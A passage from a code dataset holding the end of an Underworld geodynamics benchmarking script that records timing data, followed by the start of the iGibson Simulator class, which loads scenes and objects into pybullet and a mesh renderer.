)\n\n# Create buoyancy force vector\nbuoyancyFn = -densityFn*z_hat\n\n\n# Construct node sets using the mesh specialSets\niWalls = mesh.specialSets[\"MinI_VertexSet\"] + mesh.specialSets[\"MaxI_VertexSet\"]\njWalls = mesh.specialSets[\"MinJ_VertexSet\"] + mesh.specialSets[\"MaxJ_VertexSet\"]\nkWalls = mesh.specialSets[\"MinK_VertexSet\"] + mesh.specialSets[\"MaxK_VertexSet\"]\n\nallWalls = iWalls + jWalls + kWalls\n\n# Prescribe degrees of freedom on each node to be considered Dirichlet conditions.\n# In the x direction on allWalls flag as Dirichlet\n# In the y direction on jWalls (horizontal) flag as Dirichlet\nstokesBC = uw.conditions.DirichletCondition( variable = velocityField,\n indexSetsPerDof = (allWalls, allWalls, kWalls))\nadvdiffBc = uw.conditions.DirichletCondition( variable = temperatureField,\n indexSetsPerDof = kWalls )\n\nstokes = uw.systems.Stokes( velocityField = velocityField,\n pressureField = pressureField,\n# voronoi_swarm = swarm,\n conditions = stokesBC,\n fn_viscosity = fn_viscosity, \n fn_bodyforce = buoyancyFn )\n\nsolver = uw.systems.Solver( stokes )\n\n# Create a system to advect the swarm\nadvector = uw.systems.SwarmAdvector( swarm=swarm, velocityField=velocityField, order=2 )\n\n# Create a dummy temperature field.\nadvdiff = uw.systems.AdvectionDiffusion(velocityField=velocityField, phiField=temperatureField, phiDotField=temperatureFieldDeriv, \n fn_diffusivity=1.,conditions=advdiffBc)\n\n\n# functions for calculating RMS velocity\nvdotv = fn.math.dot(velocityField,velocityField)\nv2sum_integral = uw.utils.Integral( mesh=mesh, fn=vdotv )\nvolume_integral = uw.utils.Integral( mesh=mesh, fn=1. )\n\n\n# Get instantaneous Stokes solution\nsolver.solve()\n# Calculate the RMS velocity.\nvrms = math.sqrt( v2sum_integral.evaluate()[0] )\n\n\n# update \ndt1 = advector.get_max_dt()\ndt2 = advdiff.get_max_dt()\ndt = min(dt1,dt2)\n# Advect using this timestep size.\nadvector.integrate(dt)\n\nadvdiff.integrate(dt)\n\n# Save things\n\nif do_IO:\n\tmeshFileHandle = mesh.save(\"{}_Mesh.h5\".format(PREFIX))\n\n\tvFH = velocityField.save(\"{}_velocityField.h5\".format(PREFIX))\n\tvelocityField.xdmf( \"{}_velocityField\".format(PREFIX), vFH, \"velocity\", meshFileHandle, \"Mesh\" )\n\n\tswarmFileHandle = swarm.save(\"{}_Swarm.h5\".format(PREFIX))\n\tmH = materialIndex.save(\"{}_materialIndex.h5\".format(PREFIX))\n\tmaterialIndex.xdmf(\"{}_materialIndex\".format(PREFIX), mH, \"material\", swarmFileHandle, \"Swarm\" )\n\n\tfig.save()\n\n\t# load things\n\t# first\t create analogues\n\tmesh_copy = uw.mesh.FeMesh_Cartesian(\n elementRes = (res, res, res),\n minCoord = (20., 20., 20.),\n maxCoord = (33., 33., 33.))\n\n\tvelocityField_copy = uw.mesh.MeshVariable( mesh=mesh_copy, nodeDofCount=3 )\n\n\tswarm_copy = uw.swarm.Swarm(mesh = mesh_copy)\n\tmaterialIndex_copy = swarm_copy.add_variable( dataType=\"int\", count=1 )\n\n\t# now load data and check loaded versions are identical to originals\n\tmesh_copy.load(\"{}_Mesh.h5\".format(PREFIX))\n\n\t# test\n\tif not np.allclose(mesh_copy.data, mesh.data):\n\t raise RuntimeError(\"Loaded mesh data does not appear to be identical to previous data.\")\n\tvelocityField_copy.load(\"{}_velocityField.h5\".format(PREFIX))\n\tif not np.allclose(velocityField_copy.data, velocityField.data):\n\t raise RuntimeError(\"Loaded velocity data does not appear to be identical to previous data.\")\n\n\n\tswarm_copy.load(\"{}_Swarm.h5\".format(PREFIX))\n\n\tif not np.allclose(swarm_copy.particleCoordinates.data, swarm.particleCoordinates.data):\n\t\traise 
RuntimeError(\"Loaded swarm data does not appear to be identical to previous data.\")\n\tmaterialIndex_copy.load(\"{}_materialIndex.h5\".format(PREFIX))\n\tif not np.allclose(materialIndex_copy.data, materialIndex.data):\n\t raise RuntimeError(\"Loaded material data does not appear to be identical to previous data.\")\n\nuw.timing.stop()\nmodule_timing_data_orig = uw.timing.get_data(group_by=\"routine\")\n\n# write out data\nfilename = \"{}_Res_{}_Nproc_{}_SlurmID_{}\".format(os.environ[\"SLURM_JOB_NAME\"],res,uw.mpi.size,os.environ[\"SLURM_JOB_ID\"])\nimport json\nif module_timing_data_orig:\n module_timing_data = {}\n for key,val in module_timing_data_orig.items():\n module_timing_data[key[0]] = val\n other_timing[\"Total_Runtime\"] = uw.timing._endtime-uw.timing._starttime\n module_timing_data[\"Other_timing\"] = other_timing\n module_timing_data[\"Other_data\"] = {\"vrms\":vrms, \"res\":res, \"nproc\":uw.mpi.size}\n with open(filename+\".json\", 'w') as fp:\n json.dump(module_timing_data, fp,sort_keys=True, indent=4)\n\nuw.timing.print_table(group_by=\"routine\", output_file=filename+\".txt\", display_fraction=0.99)\n","sub_path":"rt_timed.py","file_name":"rt_timed.py","file_ext":"py","file_size_in_byte":8453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"384748746","text":"import ctypes\nimport logging\nimport os\nimport platform\nimport time\nfrom time import sleep\n\nimport numpy as np\nimport pybullet as p\n\nimport igibson\nfrom igibson.object_states.factory import get_states_by_dependency_order\nfrom igibson.objects.articulated_object import ArticulatedObject, URDFObject\nfrom igibson.objects.multi_object_wrappers import ObjectGrouper, ObjectMultiplexer\nfrom igibson.objects.object_base import Object\nfrom igibson.objects.particles import Particle, ParticleSystem\nfrom igibson.objects.stateful_object import StatefulObject\nfrom igibson.objects.visual_marker import VisualMarker\nfrom igibson.render.mesh_renderer.instances import Instance, InstanceGroup\nfrom igibson.render.mesh_renderer.mesh_renderer_cpu import MeshRenderer\nfrom igibson.render.mesh_renderer.mesh_renderer_settings import MeshRendererSettings\nfrom igibson.render.mesh_renderer.mesh_renderer_tensor import MeshRendererG2G\nfrom igibson.render.mesh_renderer.mesh_renderer_vr import MeshRendererVR, VrSettings\nfrom igibson.render.viewer import Viewer, ViewerSimple, ViewerVR\nfrom igibson.robots.behavior_robot import BehaviorRobot\nfrom igibson.robots.robot_base import BaseRobot\nfrom igibson.scenes.igibson_indoor_scene import InteractiveIndoorScene\nfrom igibson.scenes.scene_base import Scene\nfrom igibson.utils.assets_utils import get_ig_avg_category_specs\nfrom igibson.utils.constants import PyBulletSleepState, SemanticClass\nfrom igibson.utils.mesh_util import quat2rotmat, xyz2mat, xyzw2wxyz\nfrom igibson.utils.semantics_utils import get_class_name_to_class_id\nfrom igibson.utils.utils import quatXYZWFromRotMat\nfrom igibson.utils.vr_utils import VR_CONTROLLERS, VR_DEVICES, VrData, calc_offset, calc_z_rot_from_right\n\n\nclass Simulator:\n \"\"\"\n Simulator class is a wrapper of physics simulator (pybullet) and MeshRenderer, it loads objects into\n both pybullet and also MeshRenderer and syncs the pose of objects and robot parts.\n \"\"\"\n\n def __init__(\n self,\n gravity=9.8,\n physics_timestep=1 / 120.0,\n render_timestep=1 / 30.0,\n solver_iterations=100,\n mode=\"gui\",\n image_width=128,\n image_height=128,\n vertical_fov=90,\n device_idx=0,\n 
render_to_tensor=False,\n rendering_settings=MeshRendererSettings(),\n vr_settings=VrSettings(),\n ):\n \"\"\"\n :param gravity: gravity on z direction.\n :param physics_timestep: timestep of physical simulation, p.stepSimulation()\n :param render_timestep: timestep of rendering, and Simulator.step() function\n :param solver_iterations: number of solver iterations to feed into pybullet, can be reduced to increase speed.\n pybullet default value is 50.\n :param mode: choose mode from gui, headless, iggui (only open iGibson UI), or pbgui (only open pybullet UI)\n :param image_width: width of the camera image\n :param image_height: height of the camera image\n :param vertical_fov: vertical field of view of the camera image in degrees\n :param device_idx: GPU device index to run rendering on\n :param render_to_tensor: Render to GPU tensors;\n disable it when you want to run multiple physics steps but don't need to visualize each frame\n :param rendering_settings: settings to use for mesh renderer\n :param vr_settings: settings to use for VR in simulator and MeshRendererVR\n \"\"\"\n # physics simulator\n self.gravity = gravity\n self.physics_timestep = physics_timestep\n self.render_timestep = render_timestep\n self.solver_iterations = solver_iterations\n self.physics_timestep_num = self.render_timestep / self.physics_timestep\n assert self.physics_timestep_num.is_integer(), \"render_timestep must be a multiple of physics_timestep\"\n self.physics_timestep_num = int(self.physics_timestep_num)\n\n self.mode = mode\n\n self.scene = None\n\n self.particle_systems = []\n\n # TODO: remove this, currently used for testing only\n self.objects = []\n\n plt = platform.system()\n if plt == \"Darwin\" and self.mode == \"gui\":\n self.mode = \"iggui\" # for mac os disable pybullet rendering\n logging.warning(\n \"Rendering both iggui and pbgui is not supported on mac, choose either pbgui or \"\n \"iggui. 
Default to iggui.\"\n )\n if plt == \"Windows\" and self.mode in [\"vr\"]:\n # By default, windows does not provide ms level timing accuracy\n winmm = ctypes.WinDLL(\"winmm\")\n winmm.timeBeginPeriod(1)\n\n self.use_pb_renderer = False\n self.use_ig_renderer = False\n self.use_vr_renderer = False\n self.use_simple_viewer = False\n\n if self.mode in [\"gui\", \"iggui\"]:\n self.use_ig_renderer = True\n\n if self.mode in [\"gui\", \"pbgui\"]:\n self.use_pb_renderer = True\n\n if self.mode in [\"vr\"]:\n self.use_vr_renderer = True\n rendering_settings.blend_highlight = True\n\n if self.mode in [\"simple\"]:\n self.use_simple_viewer = True\n\n # Starting position for the VR (default set to None if no starting position is specified by the user)\n self.vr_start_pos = None\n self.eye_tracking_data = None\n self.max_haptic_duration = 4000\n self.image_width = image_width\n self.image_height = image_height\n self.vertical_fov = vertical_fov\n self.device_idx = device_idx\n self.render_to_tensor = render_to_tensor\n\n self.optimized_renderer = rendering_settings.optimized\n self.rendering_settings = rendering_settings\n self.viewer = None\n self.vr_settings = vr_settings\n self.vr_overlay_initialized = False\n # We must be using the Simulator's vr mode and have use_vr set to true in the settings to access the VR context\n self.can_access_vr_context = self.use_vr_renderer and self.vr_settings.use_vr\n # Duration of a vsync frame - assumes 90Hz refresh rate\n self.vsync_frame_dur = 11.11e-3\n # Get expected number of vsync frames per iGibson frame\n # Note: currently assumes a 90Hz VR system\n self.vsync_frame_num = int(round(self.render_timestep / self.vsync_frame_dur))\n # Total amount of time we want non-blocking actions to take each frame\n # Leave a small amount of time before the last vsync, just in case we overrun\n self.non_block_frame_time = (self.vsync_frame_num - 1) * self.vsync_frame_dur + (\n 5e-3 if self.vr_settings.curr_device == \"OCULUS\" else 10e-3\n )\n # Timing variables for functions called outside of step() that also take up frame time\n self.frame_end_time = None\n self.main_vr_robot = None\n\n # Variables for data saving and replay in VR\n self.last_physics_timestep = -1\n self.last_render_timestep = -1\n self.last_physics_step_num = -1\n self.last_frame_dur = -1\n self.frame_count = 0\n\n self.load()\n\n self.class_name_to_class_id = get_class_name_to_class_id()\n self.body_links_awake = 0\n # First sync always sync all objects (regardless of their sleeping states)\n self.first_sync = True\n # Set of categories that can be grasped by assisted grasping\n self.assist_grasp_category_allow_list = set()\n self.gen_assisted_grasping_categories()\n self.assist_grasp_mass_thresh = 10.0\n\n self.object_state_types = get_states_by_dependency_order()\n\n def set_timestep(self, physics_timestep, render_timestep):\n \"\"\"\n Set physics timestep and render (action) timestep\n\n :param physics_timestep: physics timestep for pybullet\n :param render_timestep: rendering timestep for renderer\n \"\"\"\n self.physics_timestep = physics_timestep\n self.render_timestep = render_timestep\n p.setTimeStep(self.physics_timestep)\n\n def set_render_timestep(self, render_timestep):\n \"\"\"\n :param render_timestep: render timestep to set in the Simulator\n \"\"\"\n self.render_timestep = render_timestep\n\n def add_viewer(self):\n \"\"\"\n Attach a debugging viewer to the renderer.\n This will make the step much slower so should be avoided when training agents\n \"\"\"\n if self.use_vr_renderer:\n 
self.viewer = ViewerVR(\n self.vr_settings.use_companion_window, frame_save_path=self.vr_settings.frame_save_path\n )\n elif self.use_simple_viewer:\n self.viewer = ViewerSimple()\n else:\n self.viewer = Viewer(simulator=self, renderer=self.renderer)\n self.viewer.renderer = self.renderer\n\n def reload(self):\n \"\"\"\n Destroy the MeshRenderer and physics simulator and start again.\n \"\"\"\n self.disconnect()\n self.load()\n\n def load(self):\n \"\"\"\n Set up MeshRenderer and physics simulation client. Initialize the list of objects.\n \"\"\"\n if self.render_to_tensor:\n self.renderer = MeshRendererG2G(\n width=self.image_width,\n height=self.image_height,\n vertical_fov=self.vertical_fov,\n device_idx=self.device_idx,\n rendering_settings=self.rendering_settings,\n simulator=self,\n )\n elif self.use_vr_renderer:\n self.renderer = MeshRendererVR(\n rendering_settings=self.rendering_settings, vr_settings=self.vr_settings, simulator=self\n )\n else:\n self.renderer = MeshRenderer(\n width=self.image_width,\n height=self.image_height,\n vertical_fov=self.vertical_fov,\n device_idx=self.device_idx,\n rendering_settings=self.rendering_settings,\n simulator=self,\n )\n\n # print(\"******************PyBullet Logging Information:\")\n if self.use_pb_renderer:\n self.cid = p.connect(p.GUI)\n else:\n self.cid = p.connect(p.DIRECT)\n\n # Simulation reset is needed for deterministic action replay\n if self.vr_settings.reset_sim:\n p.resetSimulation()\n p.setPhysicsEngineParameter(deterministicOverlappingPairs=1)\n p.setPhysicsEngineParameter(numSolverIterations=self.solver_iterations)\n p.setTimeStep(self.physics_timestep)\n p.setGravity(0, 0, -self.gravity)\n p.setPhysicsEngineParameter(enableFileCaching=0)\n self.visual_objects = {}\n self.robots = []\n self.scene = None\n if (self.use_ig_renderer or self.use_vr_renderer or self.use_simple_viewer) and not self.render_to_tensor:\n self.add_viewer()\n\n def load_without_pybullet_vis(load_func):\n \"\"\"\n Load without pybullet visualizer\n \"\"\"\n\n def wrapped_load_func(*args, **kwargs):\n p.configureDebugVisualizer(p.COV_ENABLE_RENDERING, False)\n res = load_func(*args, **kwargs)\n p.configureDebugVisualizer(p.COV_ENABLE_RENDERING, True)\n return res\n\n return wrapped_load_func\n\n @load_without_pybullet_vis\n def import_scene(\n self,\n scene,\n texture_scale=1.0,\n load_texture=True,\n render_floor_plane=False,\n class_id=SemanticClass.SCENE_OBJS,\n ):\n \"\"\"\n Import a scene into the simulator. A scene could be a synthetic one or a realistic Gibson Environment.\n\n :param scene: Scene object\n :param texture_scale: Option to scale down the texture for rendering\n :param load_texture: If you don't need rgb output, texture loading could be skipped to make rendering faster\n :param render_floor_plane: Whether to render the additionally added floor plane\n :param class_id: Class id for rendering semantic segmentation\n :return: pybullet body ids from scene.load function\n \"\"\"\n assert isinstance(scene, Scene) and not isinstance(\n scene, InteractiveIndoorScene\n ), \"import_scene can only be called with Scene that is not InteractiveIndoorScene\"\n # Load the scene. 
Returns a list of pybullet ids of the objects loaded that we can use to\n # load them in the renderer\n new_object_pb_ids = scene.load()\n self.objects += new_object_pb_ids\n\n # Load the objects in the renderer\n for new_object_pb_id in new_object_pb_ids:\n self.load_object_in_renderer(\n new_object_pb_id,\n class_id=class_id,\n texture_scale=texture_scale,\n load_texture=load_texture,\n render_floor_plane=render_floor_plane,\n use_pbr=False,\n use_pbr_mapping=False,\n )\n\n # TODO: add instance renferencing for iG v1 scenes\n\n self.scene = scene\n\n # Load the states of all the objects in the scene.\n for obj in scene.get_objects():\n if isinstance(obj, StatefulObject):\n if isinstance(obj, ObjectMultiplexer):\n for sub_obj in obj._multiplexed_objects:\n if isinstance(sub_obj, ObjectGrouper):\n for group_sub_obj in sub_obj.objects:\n for state in group_sub_obj.states.values():\n state.initialize(self)\n else:\n for state in sub_obj.states.values():\n state.initialize(self)\n else:\n for state in obj.states.values():\n state.initialize(self)\n\n return new_object_pb_ids\n\n @load_without_pybullet_vis\n def import_ig_scene(self, scene):\n \"\"\"\n Import scene from iGSDF class\n\n :param scene: iGSDFScene instance\n :return: pybullet body ids from scene.load function\n \"\"\"\n assert isinstance(\n scene, InteractiveIndoorScene\n ), \"import_ig_scene can only be called with InteractiveIndoorScene\"\n if not self.use_pb_renderer:\n scene.set_ignore_visual_shape(True)\n # skip loading visual shape if not using pybullet visualizer\n\n new_object_ids = scene.load()\n self.objects += new_object_ids\n\n for body_id, visual_mesh_to_material, link_name_to_vm in zip(\n new_object_ids, scene.visual_mesh_to_material, scene.link_name_to_vm\n ):\n use_pbr = True\n use_pbr_mapping = True\n shadow_caster = True\n physical_object = scene.objects_by_id[body_id]\n if scene.scene_source == \"IG\":\n if physical_object.category in [\"walls\", \"floors\", \"ceilings\"]:\n use_pbr = False\n use_pbr_mapping = False\n if physical_object.category == \"ceilings\":\n shadow_caster = False\n class_id = self.class_name_to_class_id.get(physical_object.category, SemanticClass.SCENE_OBJS)\n self.load_articulated_object_in_renderer(\n body_id,\n class_id=class_id,\n visual_mesh_to_material=visual_mesh_to_material,\n link_name_to_vm=link_name_to_vm,\n use_pbr=use_pbr,\n use_pbr_mapping=use_pbr_mapping,\n shadow_caster=shadow_caster,\n physical_object=physical_object,\n )\n\n self.scene = scene\n\n # Load the states of all the objects in the scene.\n for obj in scene.get_objects():\n if isinstance(obj, StatefulObject):\n if isinstance(obj, ObjectMultiplexer):\n for sub_obj in obj._multiplexed_objects:\n if isinstance(sub_obj, ObjectGrouper):\n for group_sub_obj in sub_obj.objects:\n for state in group_sub_obj.states.values():\n state.initialize(self)\n else:\n for state in sub_obj.states.values():\n state.initialize(self)\n else:\n for state in obj.states.values():\n state.initialize(self)\n\n return new_object_ids\n\n @load_without_pybullet_vis\n def import_particle_system(self, obj):\n \"\"\"\n Import an object into the simulator\n :param obj: ParticleSystem to load\n \"\"\"\n\n assert isinstance(obj, ParticleSystem), \"import_particle_system can only be called with ParticleSystem\"\n\n self.particle_systems.append(obj)\n obj.initialize(self)\n\n @load_without_pybullet_vis\n def import_object(\n self, obj, class_id=SemanticClass.USER_ADDED_OBJS, use_pbr=True, use_pbr_mapping=True, shadow_caster=True\n ):\n \"\"\"\n 
Import an object into the simulator\n\n :param obj: Object to load\n :param class_id: Class id for rendering semantic segmentation\n :param use_pbr: Whether to use pbr\n :param use_pbr_mapping: Whether to use pbr mapping\n :param shadow_caster: Whether to cast shadow\n \"\"\"\n assert isinstance(obj, Object), \"import_object can only be called with Object\"\n\n if isinstance(obj, VisualMarker) or isinstance(obj, Particle):\n # Marker objects can be imported without a scene.\n new_object_pb_id_or_ids = obj.load()\n else:\n # Non-marker objects require a Scene to be imported.\n assert self.scene is not None, \"A scene must be imported before additional objects can be imported.\"\n # Load the object in pybullet. Returns a pybullet id that we can use to load it in the renderer\n new_object_pb_id_or_ids = self.scene.add_object(obj, _is_call_from_simulator=True)\n\n # If no new bodies are immediately imported into pybullet, we have no rendering steps.\n if new_object_pb_id_or_ids is None:\n return None\n\n if isinstance(new_object_pb_id_or_ids, list):\n new_object_pb_ids = new_object_pb_id_or_ids\n else:\n new_object_pb_ids = [new_object_pb_id_or_ids]\n self.objects += new_object_pb_ids\n\n for i, new_object_pb_id in enumerate(new_object_pb_ids):\n if isinstance(obj, ArticulatedObject) or isinstance(obj, URDFObject):\n if isinstance(obj, ArticulatedObject):\n visual_mesh_to_material = None\n else:\n visual_mesh_to_material = obj.visual_mesh_to_material[i]\n link_name_to_vm = obj.link_name_to_vm[i]\n self.load_articulated_object_in_renderer(\n new_object_pb_id,\n class_id=class_id,\n use_pbr=use_pbr,\n use_pbr_mapping=use_pbr_mapping,\n visual_mesh_to_material=visual_mesh_to_material,\n link_name_to_vm=link_name_to_vm,\n shadow_caster=shadow_caster,\n physical_object=obj,\n )\n else:\n softbody = obj.__class__.__name__ == \"SoftObject\"\n self.load_object_in_renderer(\n new_object_pb_id,\n class_id=class_id,\n softbody=softbody,\n use_pbr=use_pbr,\n use_pbr_mapping=use_pbr_mapping,\n shadow_caster=shadow_caster,\n physical_object=obj,\n )\n\n # Finally, initialize the object's states\n if isinstance(obj, StatefulObject):\n if isinstance(obj, ObjectMultiplexer):\n for sub_obj in obj._multiplexed_objects:\n if isinstance(sub_obj, ObjectGrouper):\n for group_sub_obj in sub_obj.objects:\n for state in group_sub_obj.states.values():\n state.initialize(self)\n else:\n for state in sub_obj.states.values():\n state.initialize(self)\n else:\n for state in obj.states.values():\n state.initialize(self)\n\n return new_object_pb_id_or_ids\n\n @load_without_pybullet_vis\n def load_visual_sphere(self, radius, color=[1, 0, 0]):\n \"\"\"\n Load a visual-only (not controlled by pybullet) sphere into the renderer.\n Such a sphere can be moved around without affecting PyBullet determinism.\n :param radius: the radius of the visual sphere in meters\n :param color: RGB color of sphere (from 0 to 1 on each axis)\n \"\"\"\n sphere_file = os.path.join(igibson.assets_path, \"models/mjcf_primitives/sphere8.obj\")\n self.renderer.load_object(\n sphere_file,\n transform_orn=[0, 0, 0, 1],\n transform_pos=[0, 0, 0],\n input_kd=[1, 0, 0],\n scale=[radius, radius, radius],\n )\n visual_object = len(self.renderer.get_visual_objects()) - 1\n self.renderer.add_instance(\n visual_object,\n pybullet_uuid=0, # this can be ignored\n class_id=1, # this can be ignored\n dynamic=False,\n softbody=False,\n use_pbr=False,\n use_pbr_mapping=False,\n shadow_caster=False,\n )\n # Return instance so we can control it\n return 
self.renderer.instances[-1]\n\n @load_without_pybullet_vis\n def load_object_in_renderer(\n self,\n object_pb_id,\n class_id=None,\n softbody=False,\n texture_scale=1.0,\n load_texture=True,\n render_floor_plane=False,\n use_pbr=True,\n use_pbr_mapping=True,\n shadow_caster=True,\n physical_object=None,\n ):\n \"\"\"\n Load the object into renderer\n :param object_pb_id: pybullet body id\n :param class_id: Class id for rendering semantic segmentation\n :param softbody: Whether the object is soft body\n :param texture_scale: Texture scale\n :param load_texture: If you don't need rgb output, texture loading could be skipped to make rendering faster\n :param render_floor_plane: Whether to render the additionally added floor plane\n :param use_pbr: Whether to use pbr\n :param use_pbr_mapping: Whether to use pbr mapping\n :param shadow_caster: Whether to cast shadow\n :param physical_object: The reference to Object class\n \"\"\"\n\n # Load object in renderer, use visual shape and base_link frame\n # not CoM frame\n # Do not load URDFObject or ArticulatedObject with this function\n if physical_object is not None and (\n isinstance(physical_object, ArticulatedObject) or isinstance(physical_object, URDFObject)\n ):\n raise ValueError(\"loading articulated object with load_object_in_renderer function\")\n\n for shape in p.getVisualShapeData(object_pb_id):\n id, link_id, type, dimensions, filename, rel_pos, rel_orn, color = shape[:8]\n dynamics_info = p.getDynamicsInfo(id, link_id)\n inertial_pos, inertial_orn = dynamics_info[3], dynamics_info[4]\n rel_pos, rel_orn = p.multiplyTransforms(*p.invertTransform(inertial_pos, inertial_orn), rel_pos, rel_orn)\n # visual meshes frame are transformed from the urdfLinkFrame as origin to comLinkFrame as origin\n visual_object = None\n if type == p.GEOM_MESH:\n filename = filename.decode(\"utf-8\")\n if (filename, tuple(dimensions), tuple(rel_pos), tuple(rel_orn)) not in self.visual_objects.keys():\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=np.array(dimensions),\n texture_scale=texture_scale,\n load_texture=load_texture,\n )\n self.visual_objects[(filename, tuple(dimensions), tuple(rel_pos), tuple(rel_orn))] = (\n len(self.renderer.visual_objects) - 1\n )\n visual_object = self.visual_objects[(filename, tuple(dimensions), tuple(rel_pos), tuple(rel_orn))]\n elif type == p.GEOM_SPHERE:\n filename = os.path.join(igibson.assets_path, \"models/mjcf_primitives/sphere8.obj\")\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=[dimensions[0] / 0.5, dimensions[0] / 0.5, dimensions[0] / 0.5],\n )\n visual_object = len(self.renderer.get_visual_objects()) - 1\n elif type == p.GEOM_CAPSULE or type == p.GEOM_CYLINDER:\n filename = os.path.join(igibson.assets_path, \"models/mjcf_primitives/cube.obj\")\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=[dimensions[1] / 0.5, dimensions[1] / 0.5, dimensions[0]],\n )\n visual_object = len(self.renderer.get_visual_objects()) - 1\n elif type == p.GEOM_BOX:\n filename = os.path.join(igibson.assets_path, \"models/mjcf_primitives/cube.obj\")\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=np.array(dimensions),\n )\n visual_object = len(self.renderer.visual_objects) - 1\n elif type == p.GEOM_PLANE:\n # By default, we add an additional floor surface 
to \"smooth out\" that of the original mesh.\n # Normally you don't need to render this additionally added floor surface.\n # However, if you do want to render it for some reason, you can set render_floor_plane to be True.\n if render_floor_plane:\n filename = os.path.join(igibson.assets_path, \"models/mjcf_primitives/cube.obj\")\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=[100, 100, 0.01],\n )\n visual_object = len(self.renderer.visual_objects) - 1\n if visual_object is not None:\n self.renderer.add_instance(\n visual_object,\n pybullet_uuid=object_pb_id,\n class_id=class_id,\n dynamic=True,\n softbody=softbody,\n use_pbr=use_pbr,\n use_pbr_mapping=use_pbr_mapping,\n shadow_caster=shadow_caster,\n )\n if physical_object is not None:\n physical_object.renderer_instances.append(self.renderer.instances[-1])\n\n @load_without_pybullet_vis\n def load_articulated_object_in_renderer(\n self,\n object_pb_id,\n physical_object,\n link_name_to_vm,\n class_id=None,\n visual_mesh_to_material=None,\n use_pbr=True,\n use_pbr_mapping=True,\n shadow_caster=True,\n ):\n \"\"\"\n Load the articulated object into renderer\n\n :param object_pb_id: pybullet body id\n :param physical_object: The reference to Object class\n :param link_name_to_vm: mapping from link name to a list of visual mesh file paths\n :param class_id: Class id for rendering semantic segmentation\n :param visual_mesh_to_material: mapping from visual mesh to randomizable materials\n :param use_pbr: Whether to use pbr\n :param use_pbr_mapping: Whether to use pbr mapping\n :param shadow_caster: Whether to cast shadow\n \"\"\"\n # Load object in renderer, use visual shape from physical_object class\n # using CoM frame\n # only load URDFObject or ArticulatedObject with this function\n if not (\n isinstance(physical_object, ArticulatedObject)\n or isinstance(physical_object, URDFObject)\n or isinstance(physical_object, ObjectMultiplexer)\n ):\n raise ValueError(\"loading non-articulated object with load_articulated_object_in_renderer function\")\n\n visual_objects = []\n link_ids = []\n poses_rot = []\n poses_trans = []\n color = [0, 0, 0]\n for link_id in list(range(p.getNumJoints(object_pb_id))) + [-1]:\n if link_id == -1:\n link_name = p.getBodyInfo(object_pb_id)[0].decode(\"utf-8\")\n else:\n link_name = p.getJointInfo(object_pb_id, link_id)[12].decode(\"utf-8\")\n\n collision_shapes = p.getCollisionShapeData(object_pb_id, link_id)\n collision_shapes = [item for item in collision_shapes if item[2] == p.GEOM_MESH]\n # a link can have multiple collision meshes due to boxification,\n # and we want to query the original collision mesh for information\n\n if len(collision_shapes) == 0:\n continue\n else:\n _, _, type, dimensions, filename, rel_pos, rel_orn = collision_shapes[0]\n\n filenames = link_name_to_vm[link_name]\n for filename in filenames:\n overwrite_material = None\n if visual_mesh_to_material is not None and filename in visual_mesh_to_material:\n overwrite_material = visual_mesh_to_material[filename]\n\n if (\n filename,\n tuple(dimensions),\n tuple(rel_pos),\n tuple(rel_orn),\n ) not in self.visual_objects.keys() or overwrite_material is not None:\n # if the object has an overwrite material, always create a\n # new visual object even if the same visual shape exsits\n self.renderer.load_object(\n filename,\n transform_orn=rel_orn,\n transform_pos=rel_pos,\n input_kd=color[:3],\n scale=np.array(dimensions),\n overwrite_material=overwrite_material,\n )\n 
self.visual_objects[(filename, tuple(dimensions), tuple(rel_pos), tuple(rel_orn))] = (\n len(self.renderer.visual_objects) - 1\n )\n visual_objects.append(\n self.visual_objects[(filename, tuple(dimensions), tuple(rel_pos), tuple(rel_orn))]\n )\n link_ids.append(link_id)\n\n if link_id == -1:\n pos, orn = p.getBasePositionAndOrientation(object_pb_id)\n else:\n pos, orn = p.getLinkState(object_pb_id, link_id)[:2]\n poses_rot.append(np.ascontiguousarray(quat2rotmat(xyzw2wxyz(orn))))\n poses_trans.append(np.ascontiguousarray(xyz2mat(pos)))\n\n self.renderer.add_instance_group(\n object_ids=visual_objects,\n link_ids=link_ids,\n pybullet_uuid=object_pb_id,\n class_id=class_id,\n poses_trans=poses_trans,\n poses_rot=poses_rot,\n dynamic=True,\n robot=None,\n use_pbr=use_pbr,\n use_pbr_mapping=use_pbr_mapping,\n shadow_caster=shadow_caster,\n )\n\n if physical_object is not None:\n physical_object.renderer_instances.append(self.renderer.instances[-1])\n\n def import_non_colliding_objects(self, objects, existing_objects=[], min_distance=0.5):\n \"\"\"\n Loads objects into the scene such that they don't collide with existing objects.\n\n :param objects: A dictionary with objects, from a scene loaded with a particular URDF\n :param existing_objects: A list of objects that needs to be kept min_distance away when loading the new objects\n :param min_distance: A minimum distance to require for objects to load\n \"\"\"\n state_id = p.saveState()\n objects_to_add = []\n for obj_name in objects:\n obj = objects[obj_name]\n\n # Do not allow duplicate object categories\n if obj.category in self.scene.objects_by_category:\n continue\n\n add = True\n body_ids = []\n\n # Filter based on the minimum distance to any existing object\n for idx in range(len(obj.urdf_paths)):\n body_id = p.loadURDF(obj.urdf_paths[idx])\n body_ids.append(body_id)\n transformation = obj.poses[idx]\n pos = transformation[0:3, 3]\n orn = np.array(quatXYZWFromRotMat(transformation[0:3, 0:3]))\n dynamics_info = p.getDynamicsInfo(body_id, -1)\n inertial_pos, inertial_orn = dynamics_info[3], dynamics_info[4]\n pos, orn = p.multiplyTransforms(pos, orn, inertial_pos, inertial_orn)\n pos = list(pos)\n min_distance_to_existing_object = None\n for existing_object in existing_objects:\n # If a sliced obj is an existing_object, get_position will not work\n if isinstance(existing_object, ObjectMultiplexer) and isinstance(\n existing_object.current_selection(), ObjectGrouper\n ):\n obj_pos = np.array([obj.get_position() for obj in existing_object.objects]).mean(axis=0)\n else:\n obj_pos = existing_object.get_position()\n distance = np.linalg.norm(np.array(pos) - np.array(obj_pos))\n if min_distance_to_existing_object is None or min_distance_to_existing_object > distance:\n min_distance_to_existing_object = 